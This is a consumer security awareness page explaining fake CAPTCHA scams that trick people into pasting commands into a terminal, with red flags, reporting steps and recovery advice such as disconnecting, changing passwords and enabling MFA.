What is a CAPTCHA scam?
A fake CAPTCHA is a security challenge designed to look like a legitimate CAPTCHA but is a scam. Its purpose is to trick users into executing malicious code on their device, which can lead to malware infections and data theft.
Security researchers say to think of this malware like a digital pickpocket. It quietly searches your computer for information it can easily steal, like browser credentials, Outlook login data, account info, crypto-wallet data and other sensitive items.
Examples of a CAPTCHA scam
Scanning a QR code or copying text to the clipboard and pasting into a terminal. The most common version involves a "bait-and-switch" tactic. The website will show what looks like a real CAPTCHA test, but then a fake error message will pop up.
Fake error messages have also been used to trick users:
- “Copy fix” button, install
- "Please Install" error message
- Or anything that asks you to run Windows Terminal
Red flags to watch out for
- Keyboard Shortcuts: A legitimate website will never ask you to type commands or use keyboard shortcuts (like pasting code) just to prove you are human.
- Unfamiliar Domains: Real CAPTCHAs are embedded into trusted websites. Fake ones often pop up on suspicious, unfamiliar, or "sketchy" web addresses.
- Downloads: If a "CAPTCHA" asks you to download a file to complete verification, it is a scam.
If you spot a CAPTCHA scam
- Take a screenshot of the CAPTCHA or error message and report the page you were visiting to your security office if it’s through your work, or you can report it to the Federal Trade Commission.
- Also report any additional steps you may have taken.
- If you got to the site by clicking a link in an email, use the “report message” button.
How to stay safe
- The most important rule of thumb is this: A legitimate website will never ask you to run a command or use a keyboard shortcut to prove if you are human.
- Close the tab: If a site asks you to open a “Run” box or paste code, it’s a captcha scam. Close the window immediately.
- Go direct: If you’re worried a site is blocked, don’t follow the links on the screen. Type the address directly into your browser yourself.
- Create a passkey: If you are prompted to create a Passkey to log in to your accounts, do it! They are more secure than a password because they don’t require you to remember anything, and they aren’t subject to a data breach.
- Use MFA: Always turn on Multi-Factor Authentication (MFA). Even if a criminal steals your password, MFA acts like a second deadbolt on your door that they can’t unlock.
What to do if you fall victim
If you followed the keyboard prompts and authorized the commands, you should act immediately to protect your data:
- Disconnect from the internet: Turn off your Wi-Fi or unplug your internet cable to stop the malware from sending your data to the scammer.
- Change your passwords: Using a different, safe device (like your phone or tablet), change the passwords for all of your important accounts.
- Run a scan: Run a full scan using trusted antivirus or anti-malware software.
- Watch Your Money: Check your bank statements for any charges you don’t recognize.